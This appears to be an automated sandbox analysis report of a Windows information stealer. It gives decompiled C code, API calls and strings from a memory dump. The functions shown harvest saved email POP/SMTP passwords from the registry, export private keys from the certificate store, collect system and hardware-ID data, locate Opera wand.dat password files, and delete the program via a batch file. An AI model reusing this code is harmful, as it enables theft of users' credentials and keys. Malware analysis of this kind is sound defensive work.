lstrcpyA.KERNEL32(?,00000000,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000,00000104,00000105,00000105,00000105), ref: 004107C2
StrRChrIA.SHLWAPI(?,00000000,0000005C,?,00000000,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000,00000104), ref: 004107CE
lstrcpyA.KERNEL32(00000001,?,?,00000000,0000005C,?,00000000,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?), ref: 004107DC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,0000005C,?,00000000,?,C0000000,00000003,00000000), ref: 004107F3
lstrlenA.KERNEL32( :ktk del %1 if exist %1 goto ktk del %0 ,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000,00000104,00000105,00000105,00000105), ref: 00410803
CloseHandle.KERNEL32(00410C71,00000000,00410C71, :ktk del %1 if exist %1 goto ktk del %0 ,00000000, :ktk del %1 if exist %1 goto ktk del %0 ,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000), ref: 0041081A
wsprintfA.USER32 ref: 00410831
LoadLibraryA.KERNEL32(shell32.dll,00000105,00000105,00000105,?,?,00000105), ref: 0041083E
GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 0041084D
ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000,00000000,ShellExecuteA,shell32.dll,00000105,00000105,00000105,?,?,00000105), ref: 00410867

Strings

:ktk del %1 if exist %1 goto ktk del %0 , xrefs: 004107FE, 00410809
%d.bat, xrefs: 00410700
ShellExecuteA, xrefs: 00410847
"%s" , xrefs: 00410829
shell32.dll, xrefs: 00410839
open, xrefs: 00410860

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Createlstrcpywsprintf$AddressAllocCloseCountExecuteHandleLibraryLoadLocalModuleNamePathProcShellTempTicklstrcatlstrlen
String ID: :ktk del %1 if exist %1 goto ktk del %0 $ "%s" $%d.bat$ShellExecuteA$open$shell32.dll
API String ID: 2116904195-4169620016
Opcode ID: 5a27ab0cd15915a05e5231e08fcaa6e6ad12822a77b34612db5ee9e6cc8e6732
Instruction ID: ac578fb0db49b64cbbfa247985a17d63ff0acc43852cd1b9113235f47bfa6a9d
Opcode Fuzzy Hash: 5a27ab0cd15915a05e5231e08fcaa6e6ad12822a77b34612db5ee9e6cc8e6732
Instruction Fuzzy Hash: ED419E31B446057BDF19A6A68C03FEFB5B79B84704F24803A7215F62E1EAB84DC09A4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC16, Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EC16(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				char* _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				char _v2088;
				intOrPtr _v2092;
				intOrPtr _v2096;
				char _v2100;
				intOrPtr _v2104;
				intOrPtr _v2108;
				char _v2112;
				intOrPtr _v2116;
				intOrPtr _v2120;
				char _v2124;
				long _t93;
				long _t94;

				_t93 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				_t94 = _t93;
				if(_t94 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D69(E00401D15(_a8, "\\"),  &_v2064);
						_v2072 = E00401C8E(_a4, _v2068, "EmailAddress", 0);
						_v2076 = E00401C8E(_a4, _v2068, "Technology", 0);
						_v2080 = E00401C8E(_a4, _v2068, "PopServer", 0);
						_v2084 = E00401C8E(_a4, _v2068, "PopPort",  &_v2088);
						_v2092 = E00401C8E(_a4, _v2068, "PopAccount", 0);
						_v2096 = E00401C8E(_a4, _v2068, "PopPassword",  &_v2100);
						_v2104 = E00401C8E(_a4, _v2068, "SmtpServer", 0);
						_v2108 = E00401C8E(_a4, _v2068, "SmtpPort",  &_v2112);
						_v2116 = E00401C8E(_a4, _v2068, "SmtpAccount", 0);
						_v2120 = E00401C8E(_a4, _v2068, "SmtpPassword",  &_v2124);
						if(_v2072 != 0 && (_v2100 != 0 || _v2124 != 0)) {
							E00401486(_a12, 0xbeef0000);
							E004014E8(_a12, _v2072);
							E004014E8(_a12, _v2076);
							E004014E8(_a12, _v2080);
							E004014BC(_a12, _v2084, _v2088);
							E004014E8(_a12, _v2092);
							E004014BC(_a12, _v2096, _v2100);
							E004014E8(_a12, _v2104);
							E004014BC(_a12, _v2108, _v2112);
							E004014E8(_a12, _v2116);
							E004014BC(_a12, _v2120, _v2124);
						}
						E0040EC16(_a4, _v2068, _a12);
						E004017D5(_v2068);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2080);
						E004017D5(_v2084);
						E004017D5(_v2092);
						E004017D5(_v2096);
						E004017D5(_v2104);
						E004017D5(_v2108);
						E004017D5(_v2116);
						E004017D5(_v2120);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t94;
			}

0x0040ec29
0x0040ec2e
0x0040ec30
0x0040ec36
0x0040ec3d
0x0040ec3d
0x0040ec64
0x00000000
0x00000000
0x0040ec87
0x0040eca2
0x0040ecbd
0x0040ecd8
0x0040ecf8
0x0040ed13
0x0040ed33
0x0040ed4e
0x0040ed6e
0x0040ed89
0x0040eda9
0x0040edb6
0x0040edda
0x0040ede8
0x0040edf6
0x0040ee04
0x0040ee18
0x0040ee26
0x0040ee3a
0x0040ee48
0x0040ee5c
0x0040ee6a
0x0040ee7e
0x0040ee7e
0x0040ee8f
0x0040ee9a
0x0040eea5
0x0040eeb0
0x0040eebb
0x0040eec6
0x0040eed1
0x0040eedc
0x0040eee7
0x0040eef2
0x0040eefd
0x0040ef08
0x0040ef0d
0x0040ef0d
0x00000000
0x0040ef18
0x0040ef1e

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EC29
RegEnumKeyExA.ADVAPI32 ref: 0040EC5D
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EF18

Strings

SmtpServer, xrefs: 0040ED3B
SmtpPassword, xrefs: 0040ED96
SmtpAccount, xrefs: 0040ED76
PopPort, xrefs: 0040ECE5
Technology, xrefs: 0040ECAA
PopPassword, xrefs: 0040ED20
EmailAddress, xrefs: 0040EC8F
PopServer, xrefs: 0040ECC5
SmtpPort, xrefs: 0040ED5B
PopAccount, xrefs: 0040ED00

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 1332880857-2111798378
Opcode ID: 1cfb6f29303b6518b73f7a5735e7eb61c5c9ca7466050d8cfc7a5a135c5cad1b
Instruction ID: 8f7519f456700ac6ee7d3b9319165bdb56a4dd37101f5fed1b12cdcb20d8ff00
Opcode Fuzzy Hash: 1cfb6f29303b6518b73f7a5735e7eb61c5c9ca7466050d8cfc7a5a135c5cad1b
Instruction Fuzzy Hash: 6171A33194011DBBDF226F51CC42BDDBAB6BF04704F1484FAB548750B5DB7A8AA1AF88

Uniqueness

Uniqueness Score: -1.00%

Function 0040D423, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142
encryptionstringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040D423(intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				CHAR** _v16;
				CHAR* _v20;
				long* _v24;
				char _v28;
				long* _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _t48;
				int _t50;
				int _t54;
				CHAR** _t59;
				CHAR** _t62;
				CHAR** _t66;
				CHAR** _t71;
				intOrPtr _t79;
				CHAR** _t81;
				void* _t82;

				_t79 = __edx;
				_v8 = E0040150D(_a4, 0x48, 0);
				if( *0x414431 != 0 &&  *0x414435 != 0 &&  *0x41443d != 0 &&  *0x4143f9 != 0 &&  *0x4143fd != 0 &&  *0x414401 != 0 &&  *0x414405 != 0 &&  *0x414439 != 0) {
					_t48 =  *0x414431(0, 0x416057); // executed
					_v12 = _t48;
					if(_v12 != 0) {
						_t82 = 0;
						while(1) {
							_t82 =  *0x414435(_v12, _t82);
							_t94 = _t82;
							if(_t82 == 0) {
								break;
							}
							_t79 =  *((intOrPtr*)(_t82 + 0xc));
							_v16 =  *((intOrPtr*)(_t79 + 0x68));
							_t81 =  *(_t79 + 0x6c);
							__eflags = _t81;
							if(__eflags != 0) {
								while(1) {
									__eflags = _v16;
									if(__eflags == 0) {
										goto L28;
									}
									_t50 = lstrcmpA( *_t81, "2.5.29.37");
									__eflags = _t50;
									if(_t50 == 0) {
										__eflags = _t81[2];
										if(_t81[2] != 0) {
											_v20 = E004017EC(_t81[2]);
											E00401823(_t81[3], _v20, _t81[2]);
											_t54 = lstrcmpA(_v20, 0x416064);
											__eflags = _t54;
											if(_t54 == 0) {
												_t59 =  *0x41443d(_t82, 0, 0,  &_v24,  &_v28, 0);
												__eflags = _t59;
												if(_t59 != 0) {
													_t62 =  *0x4143f9(_v24, _v28,  &_v32);
													__eflags = _t62;
													if(_t62 != 0) {
														_t66 =  *0x4143fd(_v32, 0, 7, 0, 0,  &_v36);
														__eflags = _t66;
														if(_t66 != 0) {
															_v40 = E004017EC(_v36);
															_t71 =  *0x4143fd(_v32, 0, 7, 0, _v40,  &_v36);
															__eflags = _t71;
															if(_t71 != 0) {
																E00401486(_a4, 0xbeef0000);
																E004014BC(_a4,  *((intOrPtr*)(_t82 + 4)),  *((intOrPtr*)(_t82 + 8)));
																E004014BC(_a4, _v40, _v36);
															}
															E004017D5(_v40);
														}
														CryptDestroyKey(_v32);
													}
													CryptReleaseContext(_v24, 0);
												}
											}
											E004017D5(_v20);
										}
									}
									_t81 =  &(_t81[4]);
									_t40 =  &_v16;
									 *_t40 = _v16 - 1;
									__eflags =  *_t40;
								}
							}
							L28:
						}
						 *0x414439(_v12, 0);
					}
				}
				return E00401553(_t79, _t94, _a4, _v8);
			}

0x0040d423
0x0040d437
0x0040d441
0x0040d4a9
0x0040d4af
0x0040d4b6
0x0040d4bc
0x0040d4be
0x0040d4ca
0x0040d4ca
0x0040d4cc
0x00000000
0x00000000
0x0040d4d3
0x0040d4dc
0x0040d4df
0x0040d4df
0x0040d4e1
0x0040d5fa
0x0040d5fa
0x0040d5fe
0x00000000
0x00000000
0x0040d4f3
0x0040d4f8
0x0040d4fa
0x0040d500
0x0040d504
0x0040d512
0x0040d51e
0x0040d52b
0x0040d530
0x0040d532
0x0040d547
0x0040d54d
0x0040d54f
0x0040d55f
0x0040d565
0x0040d567
0x0040d578
0x0040d57e
0x0040d580
0x0040d58a
0x0040d59d
0x0040d5a3
0x0040d5a5
0x0040d5af
0x0040d5bd
0x0040d5cb
0x0040d5cb
0x0040d5d3
0x0040d5d3
0x0040d5db
0x0040d5db
0x0040d5e6
0x0040d5e6
0x0040d54f
0x0040d5ef
0x0040d5ef
0x0040d504
0x0040d5f4
0x0040d5f7
0x0040d5f7
0x0040d5f7
0x0040d5f7
0x0040d5fa
0x0040d604
0x0040d604
0x0040d60e
0x0040d60e
0x0040d4b6
0x0040d622

APIs

CertOpenSystemStoreA.CRYPT32(00000000,00416057), ref: 0040D4A9
CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D4C2
lstrcmpA.KERNEL32(?,2.5.29.37), ref: 0040D4F3

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

lstrcmpA.KERNEL32(?,00416064,00000000,?,00000000,00000000,?,2.5.29.37), ref: 0040D52B
CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D547
CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D55F
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D578
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D59D
CryptDestroyKey.ADVAPI32(?), ref: 0040D5DB
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D5E6
CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D60E

Strings

2.5.29.37, xrefs: 0040D4EC

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
String ID: 2.5.29.37
API String ID: 2649496969-3842544949
Opcode ID: 64adb788d90f03cf86861941f5e287a351f777ca5d64e8a737ecca4751077718
Instruction ID: b03ba2e338ee9a7ca6125fe278e81a7799858116ed9091dcfd2150a7fa4cb223
Opcode Fuzzy Hash: 64adb788d90f03cf86861941f5e287a351f777ca5d64e8a737ecca4751077718
Instruction Fuzzy Hash: 71516936900219FADF22AF90CC0ABEEBB71EB48304F148036F515751F0CB7A6995DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00404C68, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107
filestringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00404C68(void* __ecx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t34;
				CHAR* _t38;
				void* _t42;
				char* _t61;
				char* _t62;
				void* _t66;
				signed int* _t67;
				void* _t68;

				_t66 = __ecx;
				_v332 = 0;
				_t34 = _a8;
				if(_t34 == 0 ||  *_t34 == 0) {
					L22:
					return E004017D5(_v332);
				} else {
					if(E004024D7(_a8) != 0) {
						_t38 = E00401D15(_a8, "*.*");
					} else {
						_t38 = E00401D15(_a8, "\*.*");
					}
					_v332 = _t38;
					E00401803( &_v324, 0x13e);
					_t42 = FindFirstFileA(_v332,  &_v324); // executed
					_v328 = _t42;
					if(_t42 + 1 != 0) {
						do {
							_t67 =  &_v324;
							if(( *_t67 & 0x00000010) == 0) {
								_v336 =  &(_t67[0xb]);
								if(StrStrIA(_v336, ".ini") != 0) {
									_t61 = E00401D69(E00401D15(_a8, "\\"), _v336);
									_push(_t61);
									_push(_t61);
									if(_a12 == 0) {
										_t62 = 1;
									} else {
										_t62 = StrStrIA(_t61, "Sites\\");
									}
									_pop(_t68);
									if(_t62 != 0) {
										E00404C51(_a4, _t68);
									}
									E004017D5();
								}
							} else {
								if(lstrcmpiA(0x414806,  &(_t67[0xb])) != 0) {
									if(lstrcmpiA(0x414808,  &( &_v324->cFileName)) != 0) {
										E00404C68(_t66, _a4, E00401D69(E00401D15(_a8, "\\"),  &( &_v324->cFileName)), _a12);
										E004017D5(_t56);
									}
								}
							}
						} while (FindNextFileA(_v328,  &_v324) != 0);
						FindClose(_v328);
					}
					goto L22;
				}
			}

0x00404c68
0x00404c71
0x00404c7e
0x00404c80
0x00404de5
0x00404df1
0x00404c8c
0x00404c96
0x00404caf
0x00404c98
0x00404ca0
0x00404ca0
0x00404cb4
0x00404cc6
0x00404cd8
0x00404cdd
0x00404ce4
0x00404cea
0x00404cea
0x00404cf6
0x00404d60
0x00404d78
0x00404d8e
0x00404d93
0x00404d94
0x00404d99
0x00404da8
0x00404d9b
0x00404da1
0x00404da1
0x00404dad
0x00404db0
0x00404db6
0x00404db6
0x00404dbb
0x00404dbb
0x00404cf8
0x00404d08
0x00404d25
0x00404d51
0x00404d56
0x00404d56
0x00404d25
0x00404d08
0x00404dd2
0x00404de0
0x00404de0
0x00000000
0x00404ce4

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 00404CD8
lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00404D01
lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00404D1E
FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?,?,0000013E,?,*.*,?), ref: 00404DCD
FindClose.KERNEL32(?,?,?,?,.ini,00000000,?,?,0000013E,?,*.*,?), ref: 00404DE0

Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

Strings

.ini, xrefs: 00404D66
Sites\, xrefs: 00404D9B
*.*, xrefs: 00404CA7
\*.*, xrefs: 00404C98

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$.ini$Sites\$\*.*
API String ID: 3040542784-999409347
Opcode ID: e1bb2ffe983e4b038be18f0bf9c9b0548de30d9aec84dee69d50f4d1609f173b
Instruction ID: 5db4acfa8798974ae1da366c45271d1f2871770cf77317101492fac7cf3c5390
Opcode Fuzzy Hash: e1bb2ffe983e4b038be18f0bf9c9b0548de30d9aec84dee69d50f4d1609f173b
Instruction Fuzzy Hash: E33163B1510109AADF21BF62DC02FEE7679AF84308F1441BBB608B50F1D77C9ED09A59

Uniqueness

Uniqueness Score: -1.00%

Function 004043DD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004043DD(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				struct _OSVERSIONINFOA _v164;
				char* _v168;
				char _v172;
				intOrPtr _v176;
				struct _SYSTEM_INFO _v212;
				struct HINSTANCE__* _v216;
				int _t51;
				intOrPtr _t65;
				intOrPtr* _t75;
				void* _t82;
				struct _SYSTEM_INFO* _t85;
				char* _t87;

				_v8 = E0040150D(_a4, 0, 0);
				E00401486(_a4, 0xbeef0001);
				E00401803( &_v164, 0x9c);
				_v164.dwOSVersionInfoSize = 0x9c;
				_t51 = GetVersionExA( &_v164);
				_t85 = 0;
				_t86 = 0;
				_t87 =  &(_v164.szCSDVersion);
				while(_t85 < 0x80) {
					__eflags =  *_t87;
					if( *_t87 == 0) {
						_t86 = 1;
					}
					_t86 = _t86;
					__eflags = _t86;
					if(_t86 != 0) {
						 *_t87 = 0;
					}
					_t87 = _t87 + 1;
					_t85 =  &(_t85->dwOemId.dwOemId);
					__eflags = _t85;
				}
				if(_t51 == 0) {
					E004014BC(_a4, 0, 0);
				} else {
					E004014BC(_a4,  &_v164, 0x9c);
				}
				E00401486(_a4, E0040424A());
				_v168 = E004017EC(0x400);
				E004014BC(_a4, _v168, GetLocaleInfoA(0x400, 0x1002, _v168, 0x3ff));
				E004014BC(_a4, _v168, GetLocaleInfoA(0x400, 0x1001, _v168, 0x3ff));
				E00401486(_a4, E004042B2()); // executed
				E0040434C(_t85, _t86); // executed
				_t65 = E00402725(_t85, _t86, "HWID",  &_v172); // executed
				_v176 = _t65;
				if(_v176 == 0 || _v172 < 0x14) {
					E004014BC(_a4, 0, 0);
				} else {
					_v172 = _v172 + 4;
					E00401486(_a4, _v172);
					_v172 = _v172 - 4;
					E00401486(_a4, 0xffffffff);
					E0040149B(_a4, _v176, _v172);
				}
				E004017D5(_v176);
				E004017D5(_v168);
				_t82 = 0;
				_v216 = GetModuleHandleA("kernel32.dll");
				if(_v216 != 0) {
					_t75 = GetProcAddress(_v216, "GetNativeSystemInfo");
					if(_t75 != 0) {
						_t86 =  &_v212;
						 *_t75( &_v212); // executed
						_t82 = 1;
					}
				}
				_t96 = _t82;
				if(_t82 == 0) {
					GetSystemInfo( &_v212);
				}
				E004014BC(_a4,  &_v212, 0x24);
				return E00401553(_t86, _t96, _a4, _v8);
			}

0x004043f4
0x004043ff
0x00404410
0x00404415
0x00404426
0x0040442b
0x0040442d
0x0040442f
0x0040444a
0x00404437
0x0040443a
0x0040443c
0x0040443c
0x00404441
0x00404441
0x00404443
0x00404445
0x00404445
0x00404448
0x00404449
0x00404449
0x00404449
0x00404454
0x00404473
0x00404456
0x00404465
0x00404465
0x00404481
0x00404490
0x004044ba
0x004044e3
0x004044f1
0x004044f6
0x00404507
0x0040450c
0x00404519
0x00404567
0x00404524
0x00404524
0x00404534
0x00404539
0x00404545
0x00404559
0x00404559
0x00404572
0x0040457d
0x00404582
0x0040458e
0x0040459b
0x004045ad
0x004045af
0x004045b1
0x004045b8
0x004045ba
0x004045ba
0x004045af
0x004045bb
0x004045bd
0x004045c6
0x004045c6
0x004045d7
0x004045ea

APIs

GetVersionExA.KERNEL32(0000009C), ref: 00404426
GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,?,00000000,?,00000000,00000000,0000009C), ref: 004044AB
GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,?,?,00000000,00000400,00001002,?,000003FF,00000400,?,00000000,?,00000000), ref: 004044D4
GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,?,00000000,00000000,HWID,?,?,00000000,?,?,00000000,00000400,00001001,?), ref: 00404589
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004045A8
GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,?,00000000,00000000,HWID,?,?,00000000,?,?,00000000), ref: 004045B8
GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,?,00000000,00000000,HWID,?,?,00000000,?,?,00000000,00000400,00001001), ref: 004045C6

Strings

kernel32.dll, xrefs: 00404584
GetNativeSystemInfo, xrefs: 0040459D
HWID, xrefs: 00404502

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
String ID: GetNativeSystemInfo$HWID$kernel32.dll
API String ID: 1787888500-92997708
Opcode ID: 74b982c3051711e6a4f82ec7bc2e3ba0a2c708dbed47e03aa435c593a8e72e59
Instruction ID: a5c158b064667e592a77a643291b10812bd144366de3c56d291d59684d6421bf
Opcode Fuzzy Hash: 74b982c3051711e6a4f82ec7bc2e3ba0a2c708dbed47e03aa435c593a8e72e59
Instruction Fuzzy Hash: 07515E71A00218BEDF217BA1CC46F9D7A75AF81308F0080BAB748750F1DBB95AD09F5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040890D, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 77
filestringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040890D(void* __ecx, intOrPtr _a4, char* _a8) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char** _v336;
				char* _v340;
				char* _t30;
				void* _t36;
				int _t39;
				char* _t48;
				void* _t54;

				_t54 = __ecx;
				_v332 = 0;
				_t30 = _a8;
				if(_t30 == 0 ||  *_t30 == 0) {
					L14:
					return E004017D5(_v332);
				} else {
					_v332 = E00401D15(_a8, "\*.*");
					E00401803( &_v324, 0x13e);
					_t36 = FindFirstFileA(_v332,  &_v324); // executed
					_v328 = _t36;
					if(_t36 + 1 == 0) {
						goto L14;
					} else {
						goto L4;
					}
					do {
						L4:
						if((_v324.dwFileAttributes & 0x00000010) != 0) {
							if(lstrcmpiA(0x414806,  &( &_v324->cFileName)) != 0) {
								if(lstrcmpiA(0x414808,  &( &_v324->cFileName)) != 0) {
									_v336 =  &( &_v324->cFileName);
									_t48 = E00401D69(E00401D15(_a8, "\\"), _v336);
									_v340 = _t48;
									_push(_t48);
									if(StrStrIA(_v340, "opera") != 0) {
										E00408789(_t54, _a4, _v340, "wand.dat");
									}
									E004017D5();
								}
							}
						}
						_t39 = FindNextFileA(_v328,  &_v324); // executed
					} while (_t39 != 0);
					FindClose(_v328); // executed
					goto L14;
				}
			}

0x0040890d
0x00408916
0x00408923
0x00408925
0x00408a3a
0x00408a46
0x00408931
0x0040893e
0x00408950
0x00408962
0x00408967
0x0040896e
0x00000000
0x00000000
0x00000000
0x00000000
0x00408974
0x00408974
0x00408980
0x0040899c
0x004089b6
0x004089c3
0x004089dd
0x004089e2
0x004089e8
0x004089fb
0x00408a0b
0x00408a0b
0x00408a10
0x00408a10
0x004089b6
0x0040899c
0x00408a22
0x00408a27
0x00408a35
0x00000000
0x00408a35

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,\*.*), ref: 00408962
lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,\*.*), ref: 00408995
lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,\*.*), ref: 004089AF
StrStrIA.SHLWAPI(?,opera,00000000,00000000,?,?,004140DA,00414808,?,00414806,?,00000000,?,?,0000013E,?), ref: 004089F4
FindNextFileA.KERNEL32(?,?,00000000,?,?,0000013E,?,\*.*), ref: 00408A22
FindClose.KERNEL32(?,?,?,00000000,?,?,0000013E,?,\*.*), ref: 00408A35

Strings

opera, xrefs: 004089E9
wand.dat, xrefs: 004089FD
\*.*, xrefs: 00408931

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$Filelstrcmpi$CloseFirstNext
String ID: \*.*$opera$wand.dat
API String ID: 3663067366-3278183560
Opcode ID: 82e690228408d0f1213fd84889cbb2bc0fe423fcdafe6c43ad429ef1058aca61
Instruction ID: c71bf560eb1c7fb0c09b774ce167880e188dc30df44f9e3f007173dba5e297e0
Opcode Fuzzy Hash: 82e690228408d0f1213fd84889cbb2bc0fe423fcdafe6c43ad429ef1058aca61
Instruction Fuzzy Hash: BF312C7190011DAADF61AB61CD42BED7775AF44308F1440ABB54CB61B1DA789EC08F59

Uniqueness

Uniqueness Score: -1.00%

Function 00403F86, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117
filestringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00403F86(void* __ecx, intOrPtr _a4, char* _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t44;
				CHAR* _t48;
				void* _t52;
				int _t58;
				void* _t67;
				void* _t73;
				void* _t77;
				signed int* _t78;

				_t77 = __ecx;
				_v332 = 0;
				_t44 = _a8;
				if(_t44 == 0 ||  *_t44 == 0) {
					L25:
					return E004017D5(_v332);
				} else {
					if(E004024D7(_a8) != 0) {
						_t48 = E00401D15(_a8, "*.*");
					} else {
						_t48 = E00401D15(_a8, "\*.*");
					}
					_v332 = _t48;
					E00401803( &_v324, 0x13e);
					_t52 = FindFirstFileA(_v332,  &_v324); // executed
					_v328 = _t52;
					if(_t52 + 1 != 0) {
						do {
							_t78 =  &_v324;
							if(( *_t78 & 0x00000010) == 0) {
								_v336 =  &(_t78[0xb]);
								if(_a12 != 0) {
									if(StrStrIA(_v336, _a12) == 0) {
										goto L23;
									}
									L19:
									_t73 = E00401D69(E00401D15(_a8, "\\"), _v336);
									_push(_t73);
									if(_a20 == 0) {
										E00403E4C(_a4, _t73, _a16);
									} else {
										_a20(_a4, _t73, _a16);
									}
									E004017D5();
									goto L23;
								}
								goto L19;
							}
							if(lstrcmpiA(0x414806,  &(_t78[0xb])) != 0) {
								if(lstrcmpiA(0x414808,  &( &_v324->cFileName)) != 0) {
									if(E004024D7(_a8) != 0) {
										_t67 = E00401D15(_a8, 0);
									} else {
										_t67 = E00401D15(_a8, "\\");
									}
									E00403F86(_t77, _a4, E00401D69(_t67,  &( &_v324->cFileName)), _a12, _a16, _a20); // executed
									E004017D5(_t68);
								}
							}
							L23:
							_t58 = FindNextFileA(_v328,  &_v324); // executed
						} while (_t58 != 0);
						FindClose(_v328); // executed
					}
					goto L25;
				}
			}

0x00403f86
0x00403f8f
0x00403f9c
0x00403f9e
0x00404122
0x0040412e
0x00403faa
0x00403fb4
0x00403fcd
0x00403fb6
0x00403fbe
0x00403fbe
0x00403fd2
0x00403fe4
0x00403ff6
0x00403ffb
0x00404002
0x00404008
0x00404008
0x00404014
0x004040a0
0x004040aa
0x004040be
0x00000000
0x00000000
0x004040c0
0x004040d4
0x004040d9
0x004040de
0x004040f3
0x004040e0
0x004040e7
0x004040e7
0x004040f8
0x00000000
0x004040f8
0x00000000
0x004040ac
0x0040402a
0x00404047
0x00404058
0x0040406e
0x0040405a
0x00404062
0x00404062
0x00404091
0x00404096
0x00404096
0x00404047
0x004040fd
0x0040410a
0x0040410f
0x0040411d
0x0040411d
0x00000000
0x00404002

APIs

